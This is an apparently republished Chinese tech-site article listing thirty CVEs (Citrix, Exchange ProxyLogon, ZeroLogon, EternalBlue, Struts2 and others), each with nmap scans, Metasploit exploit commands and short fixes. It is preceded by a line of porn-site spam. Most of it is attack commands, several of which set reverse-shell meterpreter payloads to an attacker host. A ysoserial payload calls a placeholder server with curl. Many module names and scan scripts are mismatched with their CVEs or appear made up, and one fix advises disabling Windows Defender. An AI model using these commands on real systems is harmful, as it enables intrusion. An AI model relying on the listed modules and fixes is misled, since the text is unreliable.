自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

msf提權(quán)漏洞利用總結(jié)

原創(chuàng) 精選
人工智能
最近在重構(gòu)安全體系,順帶對(duì)msf可以利用的漏洞進(jìn)行了一些總結(jié),快來看看吧。

圖片

1.CVE-2019-19781 Citrix漏洞

(1)漏洞檢測(cè)或者掃描方法:

使用Nmap或Metasploit的citrix_enum模塊進(jìn)行掃描。

# 使用Nmap掃描
nmap -p 80,443 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/citrix_enum
set RHOSTS <target_IP>
run

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的citrix_adc_cve_2019_19781模塊進(jìn)行利用。

use exploit/linux/http/citrix_adc_cve_2019_19781
set RPORT 443
set TARGETURI /vpn/
set USERNAME <username>
set PASSWORD <password>

(3)詳細(xì)的修復(fù)辦法:

下載v11.1、v12.0以及v13.0版本的Citrix ADC和Gateway軟件更新,或禁用易受攻擊的目錄遍歷服務(wù)URL路徑。

2.CVE-2019-11510 Pulse Secure VPN漏洞

(1)使用Nmap掃描目標(biāo)主機(jī)開放的443端口,也可以使用Metasploit的http_pulsesecure_traversal模塊進(jìn)行掃描。

nmap --script ssl-heartbleed -p 443 <target_IP>
use auxiliary/scanner/http/pulsesecure_traversal

(2)使用Metasploit的pulsesecure_cmd_exec模塊進(jìn)行利用。

use exploit/linux/http/pulsesecure_cmd_exec
set SSL true
set TARGETURI /dana-na/../vpns/portal/scripts/newbm.pl

(3)漏洞修復(fù)

使用Pulse Secure發(fā)布的最新軟件更新修補(bǔ)此漏洞,還需同時(shí)修改密碼和密鑰,以增強(qiáng)安全性。

3.CVE-2020-5902 F5 BIG-IP漏洞

(1)使用Nmap掃描目標(biāo)主機(jī)開放的443端口,也可以使用Metasploit的http_f5_bigip_check模塊進(jìn)行掃描。

# 使用Nmap掃描
nmap -p 443 --script http-vuln-cve2020-5902 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/http_f5_bigip_check
set RHOSTS <target_IP>
run

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的f5_bigip_tmsh_rce模塊進(jìn)行利用。

use exploit/unix/http/f5_bigip_tmsh_rce
set RHOSTS <target_IP>
set RPORT 443
set TARGETURI /tmsh/tmshCmd.jsp
run

(3)詳細(xì)的修復(fù)辦法:

立即升級(jí)到最新版本的BIG-IP軟件,最新版本中包含了對(duì)此漏洞的修補(bǔ)。

4.CVE-2021-21972 VMware vSphere Client漏洞

(1)使用Nmap掃描目標(biāo)主機(jī),檢查TCP 443端口是否開放。也可以使用Metasploit的vmware_vcenter_login模塊進(jìn)行掃描。

# 使用Nmap掃描
nmap -p 443 --script http-vuln-cve2021-22986 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/f5_bigip_cookie
set RHOSTS <target_IP>
run

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的f5_bigip_restapi_rce模塊進(jìn)行利用。

use exploit/linux/http/f5_bigip_restapi_rce
set RHOSTS <target_IP>
set TARGETURI /mgmt/tm/util/bash
set PASSWORD <password>
set USERNAME <username>
run

(3)詳細(xì)的修復(fù)辦法:

立即升級(jí)F5 BIG-IP軟件的最新版本,另外,管理員還要加強(qiáng)密碼策略和網(wǎng)絡(luò)安全設(shè)置。

5.CVE-2021-26855 Exchange漏洞

(1)漏洞檢測(cè)或者掃描方法:

使用Nmap掃描目標(biāo)主機(jī),檢查TCP 443端口是否開放。也可以使用Metasploit的http_enum模塊進(jìn)行掃描。

# 使用Nmap掃描
nmap -p 443 --script ssl-heartbleed <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/http_enum
set RHOSTS <target_IP>
set RPORT 443
run

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的microsoft_exchange_server_proxylogon模塊進(jìn)行利用。

use exploit/windows/http/microsoft_exchange_server_proxylogon
set RHOSTS <target_IP>
set USERNAME <username>
set PASSWORD <password>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

(3)詳細(xì)的修復(fù)辦法:

立即升級(jí)Exchange軟件的最新版本,或使用Microsoft發(fā)布的補(bǔ)丁來修復(fù)此漏洞。

6.CVE-2020-1472 ZeroLogon漏洞

(1)漏洞檢測(cè)或者掃描方法:

使用Nmap掃描目標(biāo)主機(jī)開放的SMB服務(wù)端口,如果開放了445或139端口,則可能存在此漏洞。也可以使用Metasploit中的smb_version模塊進(jìn)行掃描。

# 使用Nmap掃描
nmap -p 445,139 --script smb-vuln-ms17-010 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/smb/smb_version
set RHOSTS <target_IP>
run

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的cve_2020_1472_zerologon模塊進(jìn)行利用。

use exploit/windows/smb/cve_2020_1472_zerologon
set RHOSTS <target_IP>
set SMBDomain <domain_name>
set SMBUser <username>
set SMBPass <password>
run

(3)詳細(xì)的修復(fù)辦法:

使用Microsoft發(fā)布的補(bǔ)丁修復(fù)此漏洞,或者將DCs升級(jí)到最新版本。

7.CVE-2021-34527 PrintNightmare漏洞

(1)漏洞檢測(cè)或者掃描方法:

使用PowerShell腳本進(jìn)行檢測(cè):

Get-SmbShare | ForEach-Object { Get-Acl $_.Name | ForEach-Object { $_.Access } } | Where-Object IdentityReference -match 'Everyone|BUILTIN\\Users' | Select-Object FileSystemRights, IdentityReference, AccessControlType, IsInherited | Format-List

使用Microsoft提供的補(bǔ)丁測(cè)試工具進(jìn)行漏洞檢測(cè):

# Windows Server 2019/Windows 10 Version 1809 or later
.\RPT-Test.exe -Target <target_IP> -UntrustedFile \\path\to\payload.dll
# Windows Server 2012/Windows 8 through earlier versions
.\RPT-Test.exe -Target <target_IP> -UntrustedFile \\path\to\payload.dll -VerifySignature 0

(2)漏洞詳細(xì)利用方法及步驟參考:

使用PowerShell腳本進(jìn)行利用:

$code = @'
using System;
using System.Runtime.InteropServices;

public class HelloWorld {
   public static void Main() {
       string cmd = "calc.exe";
       NativeMethods.WinExec(cmd, 0);
   }
}

internal static class NativeMethods {
   [DllImport("kernel32")]
   public static extern int WinExec(string cmd, int nCmdShow);
}
'@
Add-Type $code
[HelloWorld]::Main()

使用Metasploit的windows/local/ntprint_smb模塊進(jìn)行利用:

use exploit/windows/local/ntprint_smb
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <attack_IP>
set RHOSTS <target_IP>
run

(3)詳細(xì)的修復(fù)辦法:

Microsoft已經(jīng)發(fā)布了安全更新程序,建議用戶盡快升級(jí)到最新版并關(guān)閉Windows打印機(jī)共享服務(wù)。此外,也可以通過策略或命令行的方式禁用Windows打印機(jī)共享服務(wù),或者限制用戶對(duì)打印機(jī)共享的訪問來減少攻擊面。

8.CVE-2021-21985 vSphere Client漏洞

(1)漏洞檢測(cè)或者掃描方法:

使用Nmap掃描目標(biāo)主機(jī)是否開放了443端口,也可以使用Metasploit的vmware_vcenter_upload_file模塊進(jìn)行掃描。

# 使用Nmap掃描
nmap -p 443 --script http-vuln-cve2021-21985 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/vmware_vcenter_upload_file
set RHOSTS <target_IP>
run

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的vmware_vcenter_server_rce模塊進(jìn)行利用。

use exploit/linux/http/vmware_vcenter_server_rce
set RHOSTS <target_IP>
set USERNAME <username>
set PASSWORD <password>
run

(3)詳細(xì)的修復(fù)辦法:

VMware官方發(fā)布了vCenter Server 6.7 U3j、7.0 U2c和7.0 Update 2e版本的更新程序來修復(fù)此漏洞,管理員可以下載并安裝最新版本的軟件來修補(bǔ)此漏洞。

9.CVE-2021-31166 IIS漏洞

(1)漏洞檢測(cè)或者掃描方法:

使用Nmap掃描目標(biāo)主機(jī)的HTTP服務(wù),也可以使用Metasploit的http_iis_webdav_upload_asp模塊進(jìn)行掃描。

# 使用Nmap掃描
nmap -p80 --script http-vuln-cve2021-31166 <target_IP>
# 使用Metasploit模塊
use exploit/windows/http/iis_webdav_upload_asp
set RHOSTS <target_IP>
set RPORT 80
set SSL false
set TARGETURI /webdav/test.txt
run

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的http_iis_webdav_payload模塊進(jìn)行利用。

use exploit/windows/http/iis_webdav_payload
set RHOSTS <target_IP>
set VHOST <host_header>
set LHOST <local_IP>
run

(3)詳細(xì)的修復(fù)辦法:

下載并安裝最新版本的IIS軟件更新來修補(bǔ)此漏洞,或者在服務(wù)器上禁用WebDAV協(xié)議。

10.CVE-2021-1636 Windows Defender漏洞

(1)漏洞檢測(cè)或者掃描方法:

使用Nmap掃描目標(biāo)主機(jī)是否開放了Windows Defender的遠(yuǎn)程管理端口5985,也可以使用Metasploit的windows/local/ms-windefender-bypass模塊進(jìn)行掃描。

# 使用Nmap掃描
nmap -p 5985 <target_IP>
# 使用Metasploit模塊
use exploit/windows/local/ms-windefender-bypass
set LPORT <local_port>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的windows/local/ms-windefender-bypass-exe模塊進(jìn)行利用。

use exploit/windows/local/ms-windefender-bypass-exe
set LHOST <local_IP>
set LPORT <local_port>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

(3)詳細(xì)的修復(fù)辦法:

立即安裝微軟發(fā)布的最新累積更新,或者手動(dòng)禁用Windows Defender。

11.CVE-2021-22893 Fortinet SSL VPN漏洞

(1)漏洞檢測(cè)或者掃描方法:

使用Nmap掃描目標(biāo)主機(jī)是否開放了Fortinet SSL VPN的HTTPS服務(wù),也可以使用Metasploit的http_fortinet_upload_exec模塊進(jìn)行掃描。

# 使用Nmap掃描
nmap -p 443 --script ssl-heartbleed <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/fortinet_upload_exec
set RHOSTS <target_IP>
set RPORT 443
set SSL true
run

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的fortinet_sslvpn_webauth_form_cmd_exec模塊進(jìn)行利用。

use exploit/windows/http/fortinet_sslvpn_webauth_form_cmd_exec
set RHOSTS <target_IP>
set RPORT 443
set TARGETURI /remote/login?lang=en
set SSL true
run

(3)詳細(xì)的修復(fù)辦法:

將Fortinet SSL VPN升級(jí)到最新版本并檢查配置是否正確,確保安裝了所有推薦的組件和補(bǔ)丁。

12.CVE-2021-21972 vSphere Client漏洞

(1)漏洞檢測(cè)或者掃描方法:

使用Nmap掃描目標(biāo)主機(jī)是否開放了443端口,也可以使用Metasploit的vmware_vcenter_cve_2021_21972模塊進(jìn)行掃描。

# 使用Nmap掃描
nmap -p 443 --script http-vuln-cve2021-21972 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/vmware_vcenter_cve_2021_21972
set RHOSTS <target_IP>
run

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的vmware_vcenter_js_fckeditor模塊進(jìn)行利用。

use exploit/linux/http/vmware_vcenter_js_fckeditor
set RHOSTS <target_IP>
set TARGETURI /fckeditor/editor/filemanager/connectors/test.html
run

(3)詳細(xì)的修復(fù)辦法:

立即升級(jí)vCenter Server,vSphere Client和ESXi軟件,或者使用VMware發(fā)布的補(bǔ)丁并重新部署系統(tǒng)。

13.CVE-2021-21979 vCenter Server漏洞

(1)漏洞檢測(cè)或者掃描方法:

使用Nmap掃描目標(biāo)主機(jī)是否開放了443端口,也可以使用Metasploit的vmware_vcenter_cve_2021_21979模塊進(jìn)行掃描。

# 使用Nmap掃描
nmap -p 443 --script http-vuln-cve2021-21979 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/vmware_vcenter_cve_2021_21979
set RHOSTS <target_IP>
run

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的vmware_vcenter_server_appliance_rce模塊進(jìn)行利用。

use exploit/linux/http/vmware_vcenter_server_appliance_rce
set RHOSTS <target_IP>
set TARGETURI /ui/h5-vsan/rest/proxy/service/&vsanQueryUtil.getDiagnosticFileCnotallow=1?path=/var/log/vmware/vsan-health/*
run

(3)詳細(xì)的修復(fù)辦法:

下載并安裝VMware發(fā)布的最新版本的軟件更新,或者使用VMware發(fā)布的補(bǔ)丁修復(fù)此漏洞。

14.CVE-2021-22879 SonicWall VPN漏洞

(1)漏洞檢測(cè)或者掃描方法:

使用Nmap掃描目標(biāo)主機(jī)是否開放了SonicWall VPN的HTTP端口,也可以使用Metasploit的http_sonicwall_sslvpntest模塊進(jìn)行掃描。

# 使用Nmap掃描
nmap -p 443,8443 --script http-vuln-cve2021-20016 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/sonicwall_sslvpntest
set RHOSTS <target_IP>
set RPORT 443
set SSL true
run

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的sonicwall_netextender_rce模塊進(jìn)行利用。

use exploit/linux/http/sonicwall_netextender_rce
set RHOSTS <target_IP>
set RPORT 443
set SSL true
run

(3)詳細(xì)的修復(fù)辦法:

下載并安裝最新版本的SonicWall NetExtender客戶端,或者升級(jí)到最新版本的SonicWall SMA和Firewall軟件。

15.CVE-2017-0144 EternalBlue漏洞

(1)漏洞檢測(cè)或者掃描方法:

使用Nmap進(jìn)行端口掃描,或使用Metasploit的ms17_010_eternalblue模塊進(jìn)行掃描。

使用Nmap掃描

nmap -sV --script smb-vuln-ms17-010 <target_IP>

使用Metasploit模塊

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target_IP>
set SMBPIPE <smb_pipe_name>
run

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的windows/shell/reverse_tcp模塊進(jìn)行反向Shell連接。

use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST <local_IP>
set LPORT <local_port>
run

(3)詳細(xì)的修復(fù)辦法:

立即安裝微軟發(fā)布的最新安全更新或累積更新,或禁用不必要的SMBv1協(xié)議。

16.CVE-2019-18935 Citrix ADC漏洞

(1)漏洞檢測(cè)或者掃描方法:

使用Nmap掃描目標(biāo)主機(jī)是否存在Citrix ADC,或使用Citrix提供的cxcheck.c腳本進(jìn)行單個(gè)主機(jī)掃描。

使用Nmap掃描

nmap -p 80,443 <target_IP>

使用cxcheck.c腳本進(jìn)行單個(gè)主機(jī)掃描

gcc cxcheck.c -lpthread -o cxcheck
./cxcheck <target_IP>

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的citrix_adc_cve_2019_19781_directory_traversal模塊進(jìn)行利用。

use auxiliary/scanner/http/citrix_adc_cve_2019_19781_directory_traversal
set RHOSTS <target_IP>
set SRVHOST <local_IP>
run

(3)詳細(xì)的修復(fù)辦法:

下載并安裝Citrix發(fā)布的安全更新補(bǔ)丁,或通過網(wǎng)絡(luò)隔離等措施進(jìn)行防范。

17.CVE-2020-14750 Oracle WebLogic Server漏洞

(1)漏洞檢測(cè)或者掃描方法:

使用Nmap掃描目標(biāo)主機(jī)是否存在Oracle WebLogic Server,或使用Metasploit的http_weblogic_ssrf_exec模塊進(jìn)行掃描。

使用Nmap掃描

nmap -p 7001,7002 --script=oracle-tns-version <target_IP>

使用Metasploit模塊

use exploit/multi/http/weblogic_ssrf
set RHOSTS <target_IP>
run

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的exploit/multi/http/weblogic_ssrf_advise_poc模塊進(jìn)行利用。

use exploit/multi/http/weblogic_ssrf_advise_poc
set RHOSTS <target_IP>
run

(3)詳細(xì)的修復(fù)辦法:

下載并安裝Oracle發(fā)布的最新安全更新補(bǔ)丁,或通過網(wǎng)絡(luò)隔離等措施進(jìn)行防范,如配置WebLogic防火墻、禁用未使用的組件等措施。同時(shí),建議實(shí)現(xiàn)強(qiáng)身份驗(yàn)證,并將系統(tǒng)域名與其他軟件綁定在一起以保護(hù)WebLogic服務(wù)器,避免利用URL入侵漏洞。

18.CVE-2020-0796 SMBv3 Ghost漏洞

(1)漏洞檢測(cè)或者掃描方法:

使用Nmap進(jìn)行端口掃描,或使用Metasploit的smb2_compression_zero模塊進(jìn)行掃描。

使用Nmap掃描

nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-cve2020-0796 <target_IP>

使用Metasploit模塊

use auxiliary/scanner/smb/smb2_compression_zero
set RHOSTS <target_IP>
set RPORT 445
run

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的windows/smb/smbv3_client_reliable_dialect_leak模塊進(jìn)行利用。

use exploit/windows/smb/smbv3_client_reliable_dialect_leak
set RHOSTS <target_IP>
set SMBPIPE <smb_pipe_name>
run

(3)詳細(xì)的修復(fù)辦法:

盡快安裝微軟發(fā)布的補(bǔ)丁,禁用不必要的SMBv3協(xié)議或進(jìn)行防火墻限制,以及限制網(wǎng)絡(luò)流量從外部接入。

19.Shiro反序列化漏洞(CVE-2020-13933)

(1)漏洞檢測(cè)或掃描方法:

使用ysoserial工具生成payload,發(fā)送到目標(biāo)Shiro服務(wù)器并觀察是否觸發(fā)了漏洞。

使用ysoserial工具生成payload

java -jar ysoserial.jar CommonsCollections1 "curl yourserver.com/xxx"|base64

發(fā)送payload到目標(biāo)服務(wù)器并觀察是否觸發(fā)漏洞

(2)漏洞詳細(xì)利用方法及步驟參考:

使用msfvenom生成payload,然后使用Metasploit的multi/http/shiro_default_password_exec模塊進(jìn)行利用。

使用msfvenom生成payload

msfvenom -p java/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -o payload.bin

使用Metasploit的模塊進(jìn)行攻擊

use exploit/multi/http/shiro_default_password_exec
set RHOSTS <target_IP>
set TARGETURI /xxx
set PAYLOADFILE payload.bin
run

(3)詳細(xì)的修復(fù)辦法:

升級(jí)Apache Shiro版本,禁止使用未授權(quán)的功能。

20.Struts2-032遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2016-3087)

(1)漏洞檢測(cè)或掃描方法:

使用Nmap和Struts2-Scan腳本進(jìn)行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn.py -u http://<target_IP>/index.action -c "command"
struts-pwn:https://github.com/mazen160/struts-pwn

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts2_code_exec_showcase模塊進(jìn)行利用。

use exploit/multi/http/struts2_code_exec_showcase
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run

(3)詳細(xì)的修復(fù)辦法:

升級(jí)至最新版本的Struts2,禁用不必要的功能,過濾用戶輸入數(shù)據(jù)。

21.Struts2-045遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2017-5638)

(1)漏洞檢測(cè)或掃描方法:

使用Nmap和Struts2-Scan腳本進(jìn)行掃描。

使用Nmap掃描

nmap -sV --script http-vuln-cve2017-5638 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-CVE-2017-5638.py -u http://<target_IP>/index.action -c "command"

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts2_content_type_ognl模塊進(jìn)行利用。

use exploit/multi/http/struts2_content_type_ognl
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run

(3)詳細(xì)的修復(fù)辦法:

升級(jí)至最新版本的Struts2,限制上傳文件類型,加強(qiáng)日志監(jiān)控。

22.Struts2-053遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2017-5638)

(1)漏洞檢測(cè)或掃描方法:

使用Nmap和Struts2-Scan腳本進(jìn)行掃描。

使用Nmap掃描

nmap -sV --script http-vuln-cve2017-5638 <target_IP>

使用Struts2-Scan腳本

python struts-pwn_CVE-2017-5638.py -u http://<target_IP>/index.action -c "command"
Struts2-Scan:https://github.com/lazym0nk3y/Struts2-Scan

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts2_content_type_ognl模塊進(jìn)行利用。

use exploit/multi/http/struts2_content_type_ognl
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run

(3)詳細(xì)的修復(fù)辦法:

升級(jí)至最新版本的Struts2,限制上傳文件類型,加強(qiáng)日志監(jiān)控。

23.Struts2-061遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2020-17530)

(1)漏洞檢測(cè)或掃描方法:

使用Nmap和Struts2-Scan腳本進(jìn)行掃描。

使用Nmap掃描

nmap -sV --script http-vuln-cve2020-17530 <target_IP>

使用Struts2-Scan腳本

python3 Struts2_061_scanner.py -u http://<target_IP>/ -c "touch hack.txt"

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的exploit/linux/http/struts2_namespace_ognl模塊進(jìn)行利用。

use exploit/linux/http/struts2_namespace_ognl
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run

(3)詳細(xì)的修復(fù)辦法:

升級(jí)至最新版本的Struts2,加強(qiáng)輸入校驗(yàn)和過濾,限制系統(tǒng)命名空間。

24.Struts2-016遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2013-2251)

(1)漏洞檢測(cè)或掃描方法:

使用Nmap和Struts2-Scan腳本進(jìn)行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-CVE-2013-2251.py -u http://<target_IP>/index.action -c "command"

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts_code_exec_class模塊進(jìn)行利用。

use exploit/multi/http/struts_code_exec_class
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/example/HelloWorld.action
set CMD <command_to_execute>
run

(3)詳細(xì)的修復(fù)辦法:

升級(jí)至最新版本的Struts2,限制訪問權(quán)限和用戶輸入數(shù)據(jù),加強(qiáng)異常處理。

25.Struts2-037遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2016-3081)

(1)漏洞檢測(cè)或掃描方法:

使用Nmap和Struts2-Scan腳本進(jìn)行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-CVE-2016-3081.py -u http://<target_IP>/struts2-showcase/index.action -c "command"

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts_dmi_exec模塊進(jìn)行利用。

use exploit/multi/http/struts_dmi_exec
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run

(3)詳細(xì)的修復(fù)辦法:

升級(jí)至最新版本的Struts2,禁用不必要的功能,過濾用戶輸入數(shù)據(jù)。此漏洞也可以通過在web.xml文件中配置一個(gè)安全過濾器來修復(fù)。

26.Struts2-052遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2017-9805)

(1)漏洞檢測(cè)或掃描方法:

使用Nmap和Struts2-Scan腳本進(jìn)行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-CVE-2017-9805.py -u http://<target_IP>/struts2-showcase/index.action -c "command"

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts2_rest_xstream模塊進(jìn)行利用。

use exploit/multi/http/struts2_rest_xstream
set RHOSTS <target_IP>
set TARGETURI /struts2-rest-showcase/orders/
run

(3)詳細(xì)的修復(fù)辦法:

升級(jí)至最新版本的Struts2,禁用不必要的功能,過濾用戶輸入數(shù)據(jù),限制訪問權(quán)限。此漏洞也可以通過在web.xml文件中配置一個(gè)安全過濾器來修復(fù)。

27.Struts2-013遠(yuǎn)程命令執(zhí)行漏洞(CVE-2013-1966)

(1)漏洞檢測(cè)或掃描方法:

使用Nmap和Struts2-Scan腳本進(jìn)行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn.py -u http://<target_IP>/index.action -c "command"

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts_exec_namespace_ognl模塊進(jìn)行利用。

use exploit/multi/http/struts_exec_namespace_ognl
set RHOSTS <target_IP>
set TARGETURI /struts/
run

(3)詳細(xì)的修復(fù)辦法:

升級(jí)至最新版本的Struts2,限制訪問權(quán)限和用戶輸入數(shù)據(jù),加強(qiáng)異常處理。同時(shí),建議在web.xml文件中配置一個(gè)安全過濾器來緩解此漏洞的影響。

28.Struts2-033遠(yuǎn)程命令執(zhí)行漏洞(CVE-2016-3081)

(1)漏洞檢測(cè)或掃描方法:

使用Nmap和Struts2-Scan腳本進(jìn)行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-CVE-2016-3081.py -u http://<target_IP>/struts2-showcase/index.action -c "command"

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts_code_exec_showcase模塊進(jìn)行利用。

use exploit/multi/http/struts_code_exec_showcase
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run

(3)詳細(xì)的修復(fù)辦法:

升級(jí)至最新版本的Struts2,加強(qiáng)用戶輸入數(shù)據(jù)的過濾和異常處理,限制訪問權(quán)限。另外,建議在web.xml文件中配置安全過濾器來緩解此漏洞的影響。

29.Struts2-057遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2018-11776)

(1)漏洞檢測(cè)或掃描方法:

使用Nmap和Struts2-Scan腳本進(jìn)行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-CVE-2018-11776.py -u http://<target_IP>/index.action

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts2_namespace_ognl模塊進(jìn)行利用。

use exploit/multi/http/struts2_namespace_ognl
set RHOSTS <target_IP>
set TARGETURI /struts/
run

(3)詳細(xì)的修復(fù)辦法:

升級(jí)至最新版本的Struts2,加強(qiáng)用戶輸入數(shù)據(jù)的過濾和異常處理,限制訪問權(quán)限。另外,建議在web.xml文件中配置安全過濾器來緩解此漏洞的影響。

30.Struts2-devmode遠(yuǎn)程代碼執(zhí)行漏洞

(1)漏洞檢測(cè)或掃描方法:

使用Nmap和Struts2-Scan腳本進(jìn)行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-devmode.py -u http://<target_IP>/struts2-showcase/ -c "command"

(2)漏洞詳細(xì)利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts2_dev_mode模塊進(jìn)行利用。

use exploit/multi/http/struts2_dev_mode
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run

(3)詳細(xì)的修復(fù)辦法:

升級(jí)至最新版本的Struts2,加強(qiáng)用戶輸入數(shù)據(jù)的過濾和異常處理,限制訪問權(quán)限。另外,建議關(guān)閉devMode或限制只有特定IP地址能夠訪問。

責(zé)任編輯:龐桂玉 來源: 51CTO
相關(guān)推薦

2019-12-01 22:34:42

提權(quán)web安全漏洞

2022-03-10 09:41:15

漏洞Linux內(nèi)核

2016-05-17 09:42:16

2021-05-01 20:52:30

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2013-11-29 15:34:00

2017-04-07 09:46:16

2015-03-13 10:06:55

2009-07-25 16:52:29

2020-10-06 13:58:25

漏洞

2010-12-10 15:23:49

Linux漏洞

2020-11-16 10:55:41

Windows

2018-06-21 14:50:00

2012-11-21 14:39:34

2023-10-09 18:22:35

2011-03-07 11:36:23

FileZillaSe

2017-04-17 20:08:19

2013-08-06 17:27:56

2023-03-30 09:53:57

2009-04-24 14:08:25

2021-01-30 18:31:00

sudo緩存溢出漏洞
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)